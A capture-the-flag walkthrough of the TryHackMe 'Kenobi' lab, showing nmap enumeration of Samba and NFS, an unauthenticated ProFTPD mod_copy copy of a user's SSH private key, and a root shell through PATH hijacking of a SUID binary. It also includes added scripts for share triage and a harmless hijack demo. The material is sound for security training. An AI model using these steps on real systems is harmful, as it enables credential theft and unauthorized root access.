Kenobi is a TryHackMe room on exploiting a Linux machine through Samba, ProFTPD and NFS, followed by privilege escalation by manipulating the PATH variable.

Task 1 – Deploy the vulnerable machine

1. Make sure you're connected to our network and deploy the machine.

Connect to VPN, hit Deploy button.

2. Scan the machine with nmap. How many ports are open?

kali@kali:~/Desktop/TryHackMe/kenobi$ nmap 10.10.130.214
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-09 18:30 EDT
Nmap scan report for 10.10.130.214
Host is up (0.020s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
2049/tcp open  nfs

Nmap done: 1 IP address (1 host up) scanned in 0.49 seconds

Task 2 – Enumerating Samba for shares

1. Using nmap we can enumerate a machine for SMB shares.

This is possible with a number of tools, but the room suggests nmap's SMB scripts. The smb-enum-shares script tries a null session first, so shares that allow anonymous access show up without credentials.

kali@kali:~/Desktop/TryHackMe/kenobi$ nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.130.214
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-09 18:32 EDT
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 1 undergoing Ping Scan
Ping Scan Timing: About 100.00% done; ETC: 18:32 (0:00:00 remaining)
Nmap scan report for 10.10.130.214
Host is up (0.018s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.130.214\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.130.214\anonymous: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.130.214\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 3.67 seconds
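A small triage helper, added here as an example and not part of the room or the original scan: it reads nmap's smb-enum-shares output and lists only the shares that permit anonymous access, which is the thing you actually want to pull out of a scan like the one above. The sample input is the scan result quoted above, embedded so the script runs offline; no hosts or shares have been added.

```bash
# Added example: filter nmap smb-enum-shares output down to the shares
# reachable anonymously. Not the room's code; sample is the scan above.

sample_smb_scan() {
  cat <<'EOF'
Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.130.214\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.130.214\anonymous: 
|     Type: STYPE_DISKTREE
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.130.214\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>
EOF
}

# Reads smb-enum-shares output on stdin and prints one tab-separated line
# "share<TAB>path<TAB>access" for every share whose Anonymous access is
# anything other than <none>.
anon_shares() {
  awk '
    # A share header line looks like "|   \\host\name: ". Strip the trailing
    # colon and keep the last backslash-separated component as the share name.
    /^\|[ ]+\\\\/ {
      s = $0
      sub(/:[ ]*$/, "", s)
      n = split(s, p, "\\")
      share = p[n]
      path = ""
    }
    # The server-side path reported for the current share.
    /Path:/ { path = $NF }
    # Emit the share only when anonymous access is granted.
    /Anonymous access:/ && $NF != "<none>" {
      printf "%s\t%s\t%s\n", share, path, $NF
    }
  '
}

# Stand-alone run over the embedded sample.
sample_smb_scan | anon_shares
```

Pipe a live scan into it instead of the sample: nmap -p 445 --script=smb-enum-shares HOST | anon_shares. On this box it returns IPC$ and anonymous; print$ drops out because anonymous access is <none>.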

2. On most distributions of Linux smbclient is already installed. Let's inspect one of the shares. Press Enter at the password prompt to connect with a null session.

kali@kali:~/Desktop/TryHackMe/kenobi$ smbclient //10.10.130.214/anonymous
Enter WORKGROUP\kali's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Sep  4 06:49:09 2019
  ..                                  D        0  Wed Sep  4 06:56:07 2019
  log.txt                             N    12237  Wed Sep  4 06:49:09 2019

                9204224 blocks of size 1024. 6877092 blocks available

3. You can also download the whole share recursively with smbget. Submit an empty password (and no username) when prompted.

kali@kali:~/Desktop/TryHackMe/kenobi$ smbget -R smb://10.10.130.214/anonymous
Password for [kali] connecting to //anonymous/10.10.130.214: 
Using workgroup WORKGROUP, user kali
smb://10.10.130.214/anonymous/log.txt                                                        

Downloaded 11.95kB in 2 seconds
kali@kali:~/Desktop/TryHackMe/kenobi$ cat log.txt 
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kenobi/.ssh/id_rsa): 
Created directory '/home/kenobi/.ssh'.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/kenobi/.ssh/id_rsa.
Your public key has been saved in /home/kenobi/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:C17GWSl/v7KlUZrOwWxSyk+F7gYhVzsbfqkCIkr2d7Q kenobi@kenobi
The key's randomart image is:
+---[RSA 2048]----+
|                 |
|           ..    |
|        . o. .   |
|       ..=o +.   |
|      . So.o++o. |
|  o ...+oo.Bo*o  |
| o o ..o.o+.@oo  |
|  . . . E .O+= . |
|     . .   oBo.  |
+----[SHA256]-----+

# This is a basic ProFTPD configuration file (rename it to 
# 'proftpd.conf' for actual use.  It establishes a single server
# and a single anonymous login.  It assumes that you have a user/group
# "nobody" and "ftp" for normal operation and anon.

ServerName                      "ProFTPD Default Installation"
ServerType                      standalone
DefaultServer                   on

# Port 21 is the standard FTP port.
Port                            21

# Don't use IPv6 support by default.
UseIPv6                         off

# Umask 022 is a good standard umask to prevent new dirs and files
# from being group and world writable.
Umask                           022

# To prevent DoS attacks, set the maximum number of child processes
# to 30.  If you need to allow more than 30 concurrent connections
# at once, simply increase this value.  Note that this ONLY works
# in standalone mode, in inetd mode you should use an inetd server
# that allows you to limit maximum number of processes per service
# (such as xinetd).
MaxInstances                    30

# Set the user and group under which the server will run.
User                            kenobi
Group                           kenobi

.....

4. What mount can we see? rpcbind on 111 and nfs on 2049 were open in the first scan, so ask the NFS server what it exports.

kali@kali:~/Desktop/TryHackMe/kenobi$ nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.130.214; echo
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-09 18:42 EDT
Nmap scan report for 10.10.130.214
Host is up (0.016s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-showmount: 
|_  /var *

Nmap done: 1 IP address (1 host up) scanned in 0.98 seconds

Task 3 – Gain initial access with ProFtpd

1. Let's get the version of ProFTPD. Use netcat to connect to the machine on the FTP port and read the banner.

kali@kali:~/Desktop/TryHackMe/kenobi$ nc 10.10.130.214 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.130.214]

2. We can use searchsploit to find exploits for a particular software version. How many exploits are there for the ProFTPD version running?

kali@kali:~/Desktop/TryHackMe/kenobi$ searchsploit -s proftpd 1.3.5
----------------------------------------------------------- ------------------------
 Exploit Title                                             |  Path
----------------------------------------------------------- ------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)  | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution        | linux/remote/36803.py
ProFTPd 1.3.5 - File Copy                                  | linux/remote/36742.txt
----------------------------------------------------------- ------------------------

3. You should have found an exploit for ProFTPD's mod_copy module.

Just hit complete after reading. mod_copy in ProFTPD 1.3.5 (CVE-2015-3306) lets an FTP client copy files on the server with SITE CPFR (copy from) and SITE CPTO (copy to) without logging in first, and the copy is performed with the privileges of the user the daemon runs as.

4. We're now going to copy Kenobi's private key using the SITE CPFR and SITE CPTO commands. This works because the leaked proftpd.conf showed the daemon running as User kenobi, so it can read /home/kenobi/.ssh/id_rsa, and because /var is exported over NFS, so a copy dropped into /var/tmp can be read back from our own machine. Note that no USER/PASS login is sent before the SITE commands.

kali@kali:~/Desktop/TryHackMe/kenobi$ nc 10.10.130.214 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.130.214]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/ida_rsa
250 Copy successful

5. Let's mount the exported /var on our machine, pull the copied key (written as ida_rsa above) out of /var/tmp, fix its permissions and log in as kenobi with it.

kali@kali:~/Desktop/TryHackMe/kenobi$ sudo mkdir /mnt/kenobiNFS
[sudo] password for kali: 
kali@kali:~/Desktop/TryHackMe/kenobi$ sudo mount 10.10.130.214:/var /mnt/kenobiNFS
kali@kali:~/Desktop/TryHackMe/kenobi$ ls -la /mnt/kenobiNFS/
total 56
drwxr-xr-x 14 root root    4096 Sep  4  2019 .
drwxr-xr-x  3 root root    4096 Sep  9 18:54 ..
drwxr-xr-x  2 root root    4096 Sep  4  2019 backups
drwxr-xr-x  9 root root    4096 Sep  4  2019 cache
drwxrwxrwt  2 root root    4096 Sep  4  2019 crash
drwxr-xr-x 40 root root    4096 Sep  4  2019 lib
drwxrwsr-x  2 root staff   4096 Apr 12  2016 local
lrwxrwxrwx  1 root root       9 Sep  4  2019 lock -> /run/lock
drwxrwxr-x 10 root crontab 4096 Sep  4  2019 log
drwxrwsr-x  2 root mail    4096 Feb 26  2019 mail
drwxr-xr-x  2 root root    4096 Feb 26  2019 opt
lrwxrwxrwx  1 root root       4 Sep  4  2019 run -> /run
drwxr-xr-x  2 root root    4096 Jan 29  2019 snap
drwxr-xr-x  5 root root    4096 Sep  4  2019 spool
drwxrwxrwt  6 root root    4096 Sep  9 18:52 tmp
drwxr-xr-x  3 root root    4096 Sep  4  2019 www
kali@kali:/mnt/kenobiNFS/tmp$ cp ida_rsa /home/kali/Desktop/TryHackMe/kenobi/id_rsa
kali@kali:/mnt/kenobiNFS/tmp$ cd /home/kali/Desktop/TryHackMe/kenobi/
kali@kali:~/Desktop/TryHackMe/kenobi$ ls
id_rsa  log.txt
kali@kali:~/Desktop/TryHackMe/kenobi$ chmod 400 id_rsa 
kali@kali:~/Desktop/TryHackMe/kenobi$ ssh -i id_rsa kenobi@10.10.130.214
load pubkey "id_rsa": invalid format
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

103 packages can be updated.
65 updates are security updates.


Last login: Wed Sep  4 07:10:15 2019 from 192.168.1.147
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

kenobi@kenobi:~$ cat user.txt 

Task 4 – Privilege Escalation with Path Variable Manipulation

1. Find files with the SUID bit set. Everything in the list below ships with Ubuntu except /usr/bin/menu, which is the one to look at.

kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6

2. Run the binary. How many options appear?

kenobi@kenobi:~$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :

3. Privesc by PATH hijacking. Option 1 (status check) of /usr/bin/menu runs curl by its bare name rather than an absolute path, so the directory order in the caller's PATH decides which curl gets executed, and because menu is SUID root, whatever that is runs as root. Drop a fake curl that runs /bin/sh into a directory, put that directory at the front of PATH, then pick option 1. Two details matter. The fake has to sit in the directory you actually prepended: the first attempt below fails because the file was created in the home directory while /tmp was prepended, so the real curl still ran and printed Apache's headers. And /bin/sh on Ubuntu is dash, which keeps the effective UID; bash would drop it unless started with -p.

kenobi@kenobi:~$ echo /bin/sh > curl
kenobi@kenobi:~$ chmod 777 curl
kenobi@kenobi:~$ export PATH=/tmp:$PATH 
kenobi@kenobi:~$ /usr/bin/menu 

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
HTTP/1.1 200 OK
Date: Wed, 09 Sep 2020 23:18:09 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Wed, 04 Sep 2019 09:07:20 GMT
ETag: "c8-591b6884b6ed2"
Accept-Ranges: bytes
Content-Length: 200
Vary: Accept-Encoding
Content-Type: text/html

kenobi@kenobi:~$ mv curl /tmp/curl
kenobi@kenobi:~$ /usr/bin/menu 

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# whoami
root
# 
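A reproducible demonstration of the hijack above, added here as an example; it is not the room's binary or the original writeup's commands. The two "menu" stand-ins are an assumption: small scripts that call curl by bare name through the shell, which is what the real binary's behaviour implies. Nothing here is SUID, so the script shows the lookup mechanics (including the wrong-directory mistake and a hardened version), not the root shell; the fake curl prints a marker instead of running /bin/sh.

```bash
# Added example of PATH hijacking against a program that calls curl by bare
# name. Not the room's code; the "menu" stand-ins are assumed scripts.

WORK=$(mktemp -d)
mkdir -p "$WORK/hijack" "$WORK/home"

# Vulnerable stand-in: "curl" is resolved through whatever PATH the caller
# hands us. In a SUID program that turns an environment variable into root.
cat > "$WORK/menu_vuln" <<'EOF'
#!/bin/sh
curl -I --max-time 2 http://localhost 2>/dev/null
EOF
chmod 755 "$WORK/menu_vuln"

# Hardened stand-in: reset PATH before any lookup (calling /usr/bin/curl by
# absolute path is the other option). For a real SUID binary this must be
# done inside the program, because the environment is attacker-controlled.
cat > "$WORK/menu_fixed" <<'EOF'
#!/bin/sh
PATH=/usr/local/bin:/usr/bin:/bin
export PATH
curl -I --max-time 2 http://localhost 2>/dev/null
EOF
chmod 755 "$WORK/menu_fixed"

# Attacker's fake curl. On the box this file just contained "/bin/sh";
# here it prints a marker so the demo is harmless.
cat > "$WORK/hijack/curl" <<'EOF'
#!/bin/sh
echo HIJACKED
EOF
chmod 755 "$WORK/hijack/curl"

# Run a victim with a directory prepended to PATH, the equivalent of
# "export PATH=/tmp:$PATH" followed by running the binary.
run_with_path() {
    PATH="$1:$PATH" "$2" 2>/dev/null || true
}

# The writeup's first attempt: fake curl written to ~, but /tmp prepended.
# The fake is never on PATH, so the genuine curl (if installed) runs.
attempt_wrong_dir() { run_with_path "$WORK/home" "$WORK/menu_vuln"; }

# Second attempt: the fake is in the directory that was prepended.
attempt_right_dir() { run_with_path "$WORK/hijack" "$WORK/menu_vuln"; }

# Same attack against the hardened stand-in: PATH is reset before lookup.
attempt_fixed() { run_with_path "$WORK/hijack" "$WORK/menu_fixed"; }

# Remove the scratch directory when finished.
cleanup() { rm -rf "$WORK"; }

echo "fake in wrong dir : [$(attempt_wrong_dir)]"
echo "fake in PATH dir  : [$(attempt_right_dir)]"
echo "hardened target   : [$(attempt_fixed)]"
```

Only the second line prints HIJACKED. Call cleanup when you are done with the scratch directory. The same check works for auditing: run strings on a SUID binary and look for bare command names next to system() or popen() calls.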

4. What is the root flag?

# cat /root/root.txt
